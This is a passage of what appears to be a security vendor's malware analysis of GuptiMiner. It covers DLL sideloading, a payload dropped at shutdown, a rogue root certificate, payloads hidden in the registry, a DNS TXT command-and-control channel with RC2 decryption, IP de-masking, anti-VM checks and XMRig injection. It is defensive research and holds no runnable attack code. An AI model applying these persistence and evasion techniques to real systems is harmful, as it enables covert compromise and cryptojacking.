<p>The malicious PNG loader is then placed in one (or both) of these locations:<br><code>C:\Program Files (x86)\Brother\Brmfl14c\BrLogAPI.dll<br>C:\Program Files\Brother\Brmfl14c\BrLogAPI.dll </code></p>
<p>The scheduled task is created by invoking a Task Scheduler. The scheduled task has these characteristics: </p>
<ul>
<li>It is created and named as <code>C:\Windows\System32\Tasks\Microsoft\Windows\Brother\Brmfl14c</code> </li>
<li>Executes: <code>C:\ProgramData\Brother\Brmfl14c\BrRemPnP.exe</code> </li>
<li>The execution is done under a folder containing the to-be-sideloaded DLL, e.g.: <code>C:\Program Files (x86)\Brother\Brmfl14c\</code> </li>
<li>The execution is performed with every boot (<code>TASK_TRIGGER_BOOT</code>) with <code>SYSTEM</code> privileges </li>
</ul>
<h3 class="wp-block-heading">Deploy During Shutdown</h3>
<p><em><code>3515113e7127dc41fb34c447f35c143f1b33fd70913034742e44ee7a9dc5cc4c<br>(2021-03-28 14:41:07 UTC)</code></em></p>
<p>Let’s now look at how all these files, clean and malicious, are being deployed. One of GuptiMiner’s tricks is that it drops the final payload, containing PNG loader stage, only during the system shutdown process. Thus, this happens at the time other applications are shutting down and potentially not protecting the user anymore.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-19.png"><img loading="lazy" decoding="async" width="754" height="732" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-19.png" alt="" class="wp-image-8426" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-19.png 754w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-19-300x291.png 300w" sizes="(max-width: 754px) 100vw, 754px" /></a><figcaption class="wp-element-caption"><em>The main flow of the Stage 0.9 variant – drops final payload during system shutdown</em></figcaption></figure></div>
<p>From the code above, we can observe that only when the <code>SM_SHUTTINGDOWN</code> metric is non-zero, meaning the current session is shutting down, as well as all the supporting clean files were dropped successfully, the final payload DLL is dropped as well. </p>
<p>An engaged reader could also notice in the code above that the first function that is being called disables Windows Defender. This is done by standard means of modifying registry keys. Only if the Defender is disabled can the malware proceed with the malicious actions. </p>
<h3 class="wp-block-heading">Adding Certificates to Windows</h3>
<p>Most of the time, GuptiMiner uses self-signed binaries for their malicious activities. However, this time around, the attackers went a step further. In this case, both of the dropped PNG loader DLLs are signed with a custom trusted root anchor certification authority. This means that the signature is inherently untrusted since the attackers’ certification authority cannot be trusted by common verification processes in Windows. </p>
<p>However, during the malware installation, GuptiMiner also adds a root certificate to Windows’ certificate store making this certification authority trusted. Thus, when such a signed file is executed, it is understood as correctly signed. This is done by using <code>CertCreateCertificateContext</code>, <code>CertOpenStore</code>, and <code>CertAddCertificateContextToStore</code> API functions.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21.png"><img loading="lazy" decoding="async" width="920" height="501" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21.png" alt="" class="wp-image-8428" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21.png 920w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21-300x163.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-21-768x418.png 768w" sizes="(max-width: 920px) 100vw, 920px" /></a><figcaption class="wp-element-caption"><em>Function which adds GuptiMiner’s root certificate to Windows</em></figcaption></figure></div>
<p>The certificate is present in a plaintext form directly in the GuptiMiner binary file.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22.png"><img loading="lazy" decoding="async" width="806" height="331" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22.png" alt="" class="wp-image-8429" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22.png 806w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22-300x123.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-22-768x315.png 768w" sizes="(max-width: 806px) 100vw, 806px" /></a><figcaption class="wp-element-caption"><em>A certificate in the plaintext form which is added as root to Windows by the malware</em></figcaption></figure></div>
<p>During our research, we found three different certificate issuers used during the GuptiMiner operations: </p>
<ul>
<li><code>GTE Class 3 Certificate Authority </code></li>
<li><code>VeriSign Class 3 Code Signing 2010</code> </li>
<li><code>DigiCert Assured ID Code Signing CA </code></li>
</ul>
<p>Note that these names are artificial and any resemblance to legitimate certification authorities shall be considered coincidental. </p>
<h3 class="wp-block-heading" id="storing-payloads-in-registry">Storing Payloads in Registry </h3>
<p><code><em>8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049</em><br><em>(upgradeshow.dll, 2023-11-23 16:41:34 UTC)</em> </code></p>
<p>At later development stages, authors behind GuptiMiner started to integrate even better persistence of their payloads by storing the payloads in registry keys. Furthermore, the payloads were also encrypted by XOR using a fixed key. This ensures that the payloads look meaningless to the naked eye. </p>
<p>We’ve discovered these registry key locations to be utilized for storing the payloads so far: </p>
<ul>
<li><code>SYSTEM\CurrentControlSet\Control\Nls\Sorting\Ids\en-US</code> </li>
<li><code>SYSTEM\CurrentControlSet\Control\PnP\Pci\CardList</code> </li>
<li><code>SYSTEM\CurrentControlSet\Control\Wdf\DMCF</code> </li>
<li><code>SYSTEM\CurrentControlSet\Control\StorVSP\Parsers</code> </li>
</ul>
<h2 class="wp-block-heading" id="png-loader">Stage 1 – PNG Loader </h2>
<p><code><em>ff884d4c01fccf08a916f1e7168080a2d740a62a774f18e64f377d23923b0297</em><br><em>(2018-04-19 09:45:25 UTC)</em> </code></p>
<p>When the entry point of the PE file is executed by the shellcode from <a href="#installation-process">Stage 0</a>, the malware first creates a scheduled task to attempt to perform cleanup of the initial infection by removing <code>updll62.dlz</code> archive and <code>version.dll</code> library from the system. </p>
<p>Furthermore, the PE serves as a dropper for additional stages by contacting an attacker’s malicious DNS server. This is done by sending a DNS request to the attacker’s DNS server, obtaining the TXT record with the response. The TXT response holds an encrypted URL domain of a real C&C server that should be requested for an additional payload. This payload is a valid PNG image file (a T-Mobile logo) which also holds a shellcode appended to its end. The shellcode is afterwards executed by the malware in a separate thread, providing further malware functionality as a next stage.</p>
<p>Note that since the DNS server itself is malicious, the requested domain name doesn’t really matter – or, in a more abstract way of thinking about this functionality, it can be rather viewed as a “password” which is passed to the server, deciding whether the DNS server should or shouldn’t provide the desired TXT answer carrying the instructions. </p>
<p>As we already mentioned in the <a href="#domains-in-time">Domains timeline section</a>, there are multiple of such “Requested domains” used. In the version referenced here, we can see these two being used: </p>
<ul>
<li><code>ext.peepzo[.]com</code> </li>
<li><code>crl.peepzo[.]com</code> </li>
</ul>
<p>and the malicious DNS server address is in this case: </p>
<ul>
<li><code>ns1.peepzo[.]com</code> </li>
</ul>
<p>Here we can see a captured DNS TXT response using Wireshark. Note that <code>Transaction ID = 0x034b</code> was left unchanged during all the years of GuptiMiner operations. We find this interesting because we would expect this could get easily flagged by firewalls or EDRs in the affected network.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24.png"><img loading="lazy" decoding="async" width="1550" height="732" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24.png" alt="" class="wp-image-8433" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24.png 1550w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24-300x142.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24-1024x484.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24-768x363.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-24-1536x725.png 1536w" sizes="(max-width: 1550px) 100vw, 1550px" /></a><figcaption class="wp-element-caption"><em>DNS TXT response captured by Wireshark</em></figcaption></figure></div>
<p>The requests when the malware is performing the queries is done in random intervals. The initial request for the DNS TXT record is performed in the first 20 minutes after the PNG loader is executed. The consecutive requests, which are done for the malware’s update routine, wait up to 69 hours between attempts. </p>
<p>This update mechanism is reflected by creating separate mutexes with the shellcode version number which is denoted by the first two bytes of the decrypted DNS TXT response (see below for the decryption process). This ensures that no shellcode with the same version is run twice on the system. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25.png"><img loading="lazy" decoding="async" width="770" height="356" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25.png" alt="" class="wp-image-8435" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25.png 770w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25-300x139.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-25-768x355.png 768w" sizes="(max-width: 770px) 100vw, 770px" /></a><figcaption class="wp-element-caption"><em>Mutex is numbered by the shellcode’s version information</em></figcaption></figure></div>
<h3 class="wp-block-heading" id="dns-txt-decryption">DNS TXT Record Decryption</h3>
<p>After the DNS TXT record is received, GuptiMiner decodes the content using base64 and decrypts it with a combination of MD5 used as a key derivation function and the RC2 cipher for the decryption. Note that in the later versions of this malware, the authors improved the decryption process by also using checksums and additional decryption keys. </p>
<p>For the key derivation function and the decryption process, the authors decided to use standard Windows CryptoAPI functions.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27.png"><img loading="lazy" decoding="async" width="963" height="318" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27.png" alt="" class="wp-image-8438" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27.png 963w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27-300x99.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-27-768x254.png 768w" sizes="(max-width: 963px) 100vw, 963px" /></a><figcaption class="wp-element-caption"><em>Typical use of standard Windows CryptoAPI functions</em></figcaption></figure></div>
<p>Interestingly, a keen eye can observe an oversight in this initialization process shown above, particularly in the <code>CryptHashData</code> function. The prototype of the <a href="https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-crypthashdata" target="_blank" rel="noreferrer noopener">CryptHashData API function</a> is:</p>
<p><code>BOOL CryptHashData(<br>  [in] HCRYPTHASH hHash,<br>  [in] const BYTE *pbData,<br>  [in] DWORD      dwDataLen,<br>  [in] DWORD      dwFlags<br>); </code></p>
<p>The second argument of this function is a pointer to an array of bytes of a length of <code>dwDataLen</code>. However, this malware provides the string <code>L"POVO@1"</code> in a Unicode (UTF-16) format, represented by the array of bytes <code>*pbData</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-28.png"><img loading="lazy" decoding="async" width="541" height="45" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-28.png" alt="" class="wp-image-8441" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-28.png 541w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-28-300x25.png 300w" sizes="(max-width: 541px) 100vw, 541px" /></a></figure></div>
<p>Thus, the first six bytes from this array are only <code>db 'P', 0, 'O', 0, 'V', 0</code> which effectively cuts the key in half and padding it with zeroes. Even though the malware authors changed the decryption key throughout the years, they never fixed this oversight, and it is still present in the latest version of GuptiMiner. </p>
<h3 class="wp-block-heading">DNS TXT Record Parsing </h3>
<p>At this point, we would like to demonstrate the decrypted TXT record and how to parse it. In this example, while accessing the attacker’s malicious DNS server <code>ns.srnmicro[.]net</code> and the requested domain <code>spf.microsoft[.]com</code>, the server returned this DNS TXT response: </p>
<p><code>VUBw2mOgagCILdD3qWwVMQFPUd0dPHO3MS/CwpL2bVESh9OnF/Pgs6mHPLktvph2</code></p>
<p>After fully decoding and decrypting this string, we get: </p>
<figure class="wp-block-image size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29.png"><img loading="lazy" decoding="async" width="850" height="72" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29.png" alt="" class="wp-image-8443" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29-300x25.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-29-768x65.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a></figure>
<p>This result contains multiple fields and can be interpreted as: </p>
<figure class="wp-block-table"><table><tbody><tr><td><strong>Name </strong></td><td><strong>Value </strong></td></tr><tr><td>Version 1 </td><td>1 </td></tr><tr><td>Version 2 </td><td>5 </td></tr><tr><td>Key size </td><td><code>\r</code> (= <code>0xD</code>) </td></tr><tr><td>Key </td><td>Microsoft.com </td></tr><tr><td>C&C URL </td><td>http://www.deanmiller[.]net/m/ </td></tr><tr><td>Checksum </td><td><code>\xde</code></td></tr></tbody></table></figure>
<p>The first two bytes, Version 1 and Version 2, form the PNG shellcode version. It is not clear why there are two such versions since Version 2 is actually never used in the program. Only Version 1 is considered whether to perform the update – i.e., whether to download and load the PNG shellcode or not. In either case, we could look at these numbers as a major version and a minor version, and only the major releases serve as a trigger for the update process.</p>
<p>The third byte is a key size that denotes how many bytes should be read afterwards, forming the key. Furthermore, no additional delimiter is needed between the key and the URL since the key size is known and the URL follows. Finally, the two-byte checksum can be verified by calculating a sum of all the bytes (modulo <code>0xFF</code>). </p>
<p>After the DNS TXT record is decoded and decrypted, the malware downloads the next stage, from the provided URL, in the form of a PNG file. This is done by using standard <code>WinINet</code> Windows API, where the <code>User-Agent</code> is set to contain the bitness of the currently running process.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30.png"><img loading="lazy" decoding="async" width="869" height="333" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30.png" alt="" class="wp-image-8446" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30.png 869w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30-300x115.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-30-768x294.png 768w" sizes="(max-width: 869px) 100vw, 869px" /></a><figcaption class="wp-element-caption"><em>The malware communicates the bitness of the running process to the C&C</em></figcaption></figure></div>
<p>The C&C server uses the <code>User-Agent</code> information for two things: </p>
<ul>
<li>Provides the next stage (a shellcode) in the correct bitness </li>
<li>Filters any HTTP request that doesn’t contain this information as a protection mechanism </li>
</ul>
<h3 class="wp-block-heading" id="parsing-the-png-file">Parsing the PNG File </h3>
<p>After the downloaded file is a valid PNG file which also contains a shellcode appended at the end. The image is a T-Mobile logo and has exactly <code>805</code> bytes. These bytes are skipped by the malware and the rest of the file, starting at an offset <code>0x325</code>, is decrypted by RC2 using the key provided in the TXT response (derived using MD5). The reason of using an image as this “prefix” is to further obfuscate the network communication where the payload looks like a legitimate image, likely overlooking the appended malware code. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-31.png"><img loading="lazy" decoding="async" width="549" height="625" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-31.png" alt="" class="wp-image-8447" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-31.png 549w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-31-264x300.png 264w" sizes="(max-width: 549px) 100vw, 549px" /></a><figcaption class="wp-element-caption"><em>PNG file containing the shellcode starting at <code>0x325</code></em></figcaption></figure></div>
<p>After the shellcode is loaded from the position <code>0x325</code>, it proceeds with loading additional PE loader from memory to unpack next stages using Gzip. </p>
<h3 class="wp-block-heading">IP Address Masking</h3>
<p><code><em>294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a</em><br><em>(2023-11-09 14:19:45 UTC)</em> </code></p>
<p>In late 2023, the authors decided to ditch the years-long approach of using DNS TXT records for distributing payloads and they switched to IP address masking instead. </p>
<p>This new approach consists of a few steps: </p>
<ol start="1">
<li>Obtain an IP address of a hardcoded server name registered to the attacker by standard means of using <code>gethostbyname</code> API function </li>
<li>For that server, two IP addresses are returned – the first is an IP address which is a masked address, and the second one denotes an available payload version and starts with <code>23.195.</code> as the first two octets </li>
<li>If the version is newer than the current one, the masked IP address is de-masked and results in a real C&C IP address </li>
<li>The real C&C IP address is used along with a hardcoded constant string (used in a URL path) to download the PNG file containing the shellcode </li>
</ol>
<p>The de-masking process is done by XORing each octet of the IP address by <code>0xA</code>, <code>0xB</code>, <code>0xC</code>, <code>0xD</code>, respectively. The result is then taken, and a hardcoded constant string is added to the URL path. </p>
<p>As an example, one such server we observed was <code>www.elimpacific[.]net</code>. It was, at the time, returning: </p>
<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-32.png"><img loading="lazy" decoding="async" width="487" height="197" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-32.png" alt="" class="wp-image-8452" style="width:487px;height:auto" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-32.png 487w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-32-300x121.png 300w" sizes="(max-width: 487px) 100vw, 487px" /></a></figure></div>
<p>The address <code>23.195.101[.]1</code> denotes a version and if it is greater than the current version, it performs the update by downloading the PNG file with the shellcode. This update is downloaded by requesting a PNG file from the real C&C server whose address is calculated by de-masking the <code>179.38.204[.]38</code> address: </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33.png"><img loading="lazy" decoding="async" width="850" height="72" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33.png" alt="" class="wp-image-8453" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33.png 850w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33-300x25.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-33-768x65.png 768w" sizes="(max-width: 850px) 100vw, 850px" /></a></figure></div>
<p>The request is then made, along with the calculated IP address <code>185.45.192[.]43</code> and a hardcoded constant <code>elimp</code>. Using a constant like this serves as an additional password, in a sense:<br><code>185.45.192[.]43/elimp/</code> </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34.png"><img loading="lazy" decoding="async" width="1024" height="235" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34-1024x235.png" alt="" class="wp-image-8454" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34-1024x235.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34-300x69.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34-768x176.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-34.png 1263w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption"><em>GuptiMiner is requesting the payload from a real IP address</em></figcaption></figure></div>
<p>When the PNG file is downloaded, the rest of the process is the same as usual. </p>
<p>We’ve discovered two servers for this functionality so far: </p>
<figure class="wp-block-table"><table><tbody><tr><td><strong>Queried server</strong> </td><td><strong>URL path constant</strong> </td></tr><tr><td><code>www.elimpacific[.]net </code></td><td><code>elimp </code></td></tr><tr><td><code>www.espcomp[.]net </code></td><td><code>OpenSans </code></td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Anti-VM and Anti-debug Tricks </h3>
<p><code><em>294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a</em><br><em>(2023-11-09 14:19:45 UTC)</em> </code></p>
<p>Along with other updates described above, we also observed an evolution in using anti-VM and anti-debugging tricks. These are done by checking well known disk drivers, registry keys, and running processes. </p>
<p>GuptiMiner checks for these disk drivers by enumerating<br><code>HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum</code>: </p>
<ul>
<li><code>vmware </code></li>
<li><code>qemu </code></li>
<li><code>vbox </code></li>
<li><code>virtualhd </code></li>
</ul>
<p>Specifically, the malware also checks the registry key <code>HKEY_LOCAL_MACHINE\SOFTWARE\Cylance</code> for the presence of Cylance AV. </p>
<p>As other anti-VM measures, the malware also checks whether the system has more than 4GB available RAM and at least 4 CPU cores. </p>
<p>Last but not least, the malware also checks the presence of these processes by their prefixes: </p>
<figure class="wp-block-table"><table><tbody><tr><td><strong>Process name prefix</strong> </td><td><strong>Tool name</strong> </td></tr><tr><td><code>wireshar </code></td><td>Wireshark </td></tr><tr><td><code>windbg. </code></td><td>WinDbg </td></tr><tr><td><code>tcpview </code></td><td>TCPView </td></tr><tr><td><code>360 </code></td><td>360 Total Security </td></tr><tr><td><code>hips </code></td><td>Huorong Internet Security (<code>hipsdaemon.exe</code>) </td></tr><tr><td><code>proce </code></td><td>Process Explorer </td></tr><tr><td><code>procm </code></td><td>Process Monitor </td></tr><tr><td><code>ollydbg </code></td><td>OllyDbg </td></tr></tbody></table></figure>
<h3 class="wp-block-heading">Storing Images in Registry</h3>
<p><code><em>6305d66aac77098107e3aa6d85af1c2e3fc2bb1f639e4a9da619c8409104c414</em><br><em>(2023-02-22 14:03:04 UTC)</em> </code></p>
<p>Similarly to <a href="#storing-payloads-in-registry">Storing Payloads in Registry</a>, in later stages of GuptiMiner, the authors also started to save the downloaded PNG images (containing the shellcodes) into registry as well. Contrary to storing the payloads, the images are not additionally XORed since the shellcodes in them are already encrypted using RC2 (see <a href="#dns-txt-decryption">DNS TXT Record Decryption</a> section for details). </p>
<p>We’ve discovered these registry key locations to be utilized for storing the encrypted images containing the shellcodes so far: </p>
<ul>
<li><code>SYSTEM\CurrentControlSet\Control\Arbiters\Class </code></li>
<li><code>SYSTEM\CurrentControlSet\Control\CMF\Class </code></li>
<li><code>SYSTEM\CurrentControlSet\Control\CMF\CORE </code></li>
<li><code>SYSTEM\CurrentControlSet\Control\CMF\DEF </code></li>
<li><code>SYSTEM\CurrentControlSet\Control\CMF\Els </code></li>
<li><code>SYSTEM\CurrentControlSet\Control\CMF\ASN </code></li>
<li><code>SYSTEM\CurrentControlSet\Control\MSDTC\BSR </code></li>
</ul>
<h2 class="wp-block-heading">Stage 2 – Gzip Loader </h2>
<p><code><em>357009a70daacfc3379560286a134b89e1874ab930d84edb2d3ba418f7ad6a0b</em><br><em>(2019-04-02 07:30:21 UTC)</em> </code></p>
<p>This stage is the shortest, the Gzip loader, which is extracted and executed by the shellcode from the PNG file, is a simple PE that decompresses another shellcode using Gzip and executes it in a separate thread. </p>
<p>This thread additionally loads Stage 3, which we call Puppeteer, that orchestrates the core functionality of the malware – the cryptocurrency mining as well as, when applicable, deploying backdoors on the infected systems. </p>
<p>Throughout the GuptiMiner operations, Gzip loader has not been changed with later versions. </p>
<h2 class="wp-block-heading">Stage 3 – Puppeteer</h2>
<p><code><em>364984e8d62eb42fd880755a296bd4a93cc071b9705c1f1b43e4c19dd84adc65</em><br><em>(2019-03-15 10:07:36 UTC)</em> </code></p>
<p>Let’s now look at the biggest Stage 3, the Puppeteer. It pulls its strings everywhere across the infected system, manipulating the GuptiMiner components to do its bidding, hence the name we’ve chosen. It orchestrates further actions and deploys two core components of the malware – an XMRig coinminer and two types of backdoors that target devices present in large corporate networks. Of course, Puppeteer also introduces additional tricks to the arsenal of the whole GuptiMiner operation. </p>
<p>This stage also uses one of the many <code>Global\SLDV</code> mutexes which we described in the <a href="#mutexes-in-time">Mutex timeline</a>. For example, this particular sample uses <code>SLDV01</code> as its mutex.</p>
<h3 class="wp-block-heading">Puppeteer Setup</h3>
<p>Puppeteer performs several steps for a proper setup. Firstly, it adds a new power scheme in Windows so the PC does not go to sleep. If the CPU has only one core (anti-VM) or the mutex already exists, the malware ceases to function by going to infinite sleep. </p>
<p>In the next phase, the malware kills all the processes with a name <code>msiexec.exe</code>, <code>cmstp.exe</code>, or <code>credwiz.exe</code>. After that, it creates a separate thread that injects XMRig into a credwiz.exe process freshly created by the malware. The malware also disables Windows Defender by setting its service start status to disabled. </p>
<p>For the persistence, Puppeteer chose an interesting approach. Firstly, it creates a scheduled task with the following configuration: </p>
<ul>
<li>A legitimate <code>rundll32.exe</code> file is copied and renamed into <code>C:\ProgramData\Microsoft\Crypto\Escan\dss.exe</code> and this file is executed from the scheduled task </li>
<li>The malicious DLL is placed to <code>C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3</code> and this file is loaded by <code>dss.exe</code> (exported function <code>ValidateFile</code>) </li>
<li>The task is executed with every boot (<code>TASK_TRIGGER_BOOT</code>) and <code>TASK_RUNLEVEL_HIGHEST</code> priority </li>
<li>The task is named and located at <code>C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade</code> </li>
</ul>
<p>With that, the malware copies the content of <code>updll3.dll3</code> into memory and deletes the original file from disk. Puppeteer then waits for a system shutdown (similarly to <a href="#installation-improvements">Stage 0.9</a>) by waiting for <code>SM_SHUTTINGDOWN</code> metric to be set to non-zero value, indicating the shutdown. This is checked every 100 milliseconds. Only when the shutdown of the system is initiated, the malware reintroduces the <code>updll3.dll3</code> file back onto disk. </p>
<p>Putting the malicious DLL back just before the system restart is really sneaky but also has potentially negative consequences. If the victim’s device encounters a crash, power outage, or any other kind of unexpected shutdown, the file won’t be restored from memory and Puppeteer will stop working from this point. Perhaps this is the reason why authors actually removed this trick in later versions, trading the sophistication for malware’s stability.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36.png"><img loading="lazy" decoding="async" width="1126" height="1270" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36.png" alt="" class="wp-image-8456" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36.png 1126w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36-266x300.png 266w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36-908x1024.png 908w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-36-768x866.png 768w" sizes="(max-width: 1126px) 100vw, 1126px" /></a><figcaption class="wp-element-caption"><em>A code ensuring the correct after-reboot execution</em></figcaption></figure></div>
<p>The repetitive loading of <code>updll3.dll3</code>, as seen in the code above, is in fact Puppeteer’s update process. The DLL will ultimately perform steps of requesting a new <a href="#parsing-the-png-file">PNG shellcode</a> from the C&C servers and if it is a new version, the chain will be updated. </p>
<h3 class="wp-block-heading">XMRig Deployment </h3>
<p>During the setup, Puppeteer created a separate thread for injecting an XMRig coinminer into <code>credwiz.exe</code> process. Before the injection takes place, however, a few preparation steps are performed. </p>
<p>The XMRig configuration is present directly in the XMRig binary (standard JSON config) stored in the Puppeteer binary. This configuration can be, however, modified to different values on the fly. In the example below, we can see a dynamic allocation of mining threads depending on the robustness of the infected system’s hardware. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-37.png"><img loading="lazy" decoding="async" width="393" height="141" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-37.png" alt="" class="wp-image-8457" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-37.png 393w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/04/image-37-300x108.png 300w" sizes="(max-width: 393px) 100vw, 393px" /></a><figcaption class="wp-element-caption"><em>Patching the XMRig configuration on the fly, dynamically assigning mining threads</em></figcaption></figure></div>
<p>The injection is standard: the malware creates a new suspended process of <code>credwiz.exe</code> and, if successful, the coinmining is injected and executed by <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code> combo. </p>
<p>Puppeteer continuously monitors the system for running process, by default every 5 seconds. If it encounters any of the monitoring tools below, the malware kills any existing mining by taking down the whole <code>credwiz.exe</code> process as well as it applies a progressive sleep, postponing another re-injection attempt by additional 5 hours. </p>
<ul>
<li><code>taskmgr.exe</code> </li>
<li><code>autoruns.exe</code> </li>
<li><code>wireshark.exe</code> </li>
<li><code>wireshark-gtk.exe</code> </li>
<li><code>tcpview.exe</code> </li>
</ul>
<p>Furthermore, the malware needs to locate the current <code>updll3.dll3</code> on the system so its latest version can be stored in memory, removed from disk, and dropped just before another system restart. Two approaches are used to achieve this: </p>
<ul>
<li>Reading eScan folder location from <code>HKEY_LOCAL_MACHINE\SOFTWARE\AVC3</code> </li>
<li>If one of the checked processes is called <code>download.exe</code>, which is a legitimate eScan binary, it obtains the file location to discover the folder. The output can look like this: 
<ul>
<li><code>\Device\HarddiskVolume1\Program Files (x86)\eScan\download.exe</code> </li>
</ul>
</li>
</ul>
<p>The check for <code>download.exe</code> serves as an alternative for locating eScan installation folder and the code seems heavily inspired by the example code of <a href="https://learn.microsoft.com/en-us/windows/win32/memory/obtaining-a-file-name-from-a-file-handle" target="_blank" rel="noreferrer noopener">Obtaining a File Name From a File handle</a> on MSDN. </p>
<p>Finally, Puppeteer also continuously monitors the CPU usage on the system and tweaks the core allocation in such a way it is not <em>that much</em> resource heavy and stays under the radar. </p>
<h3 class="wp-block-heading" id="backdoor-setup">Backdoor Setup</h3>
<p><code><em>4dfd082eee771b7801b2ddcea9680457f76d4888c64bb0b45d4ea616f0a47f21</em><br><em>(2019-06-29 03:38:24 UTC)</em> </code></p>
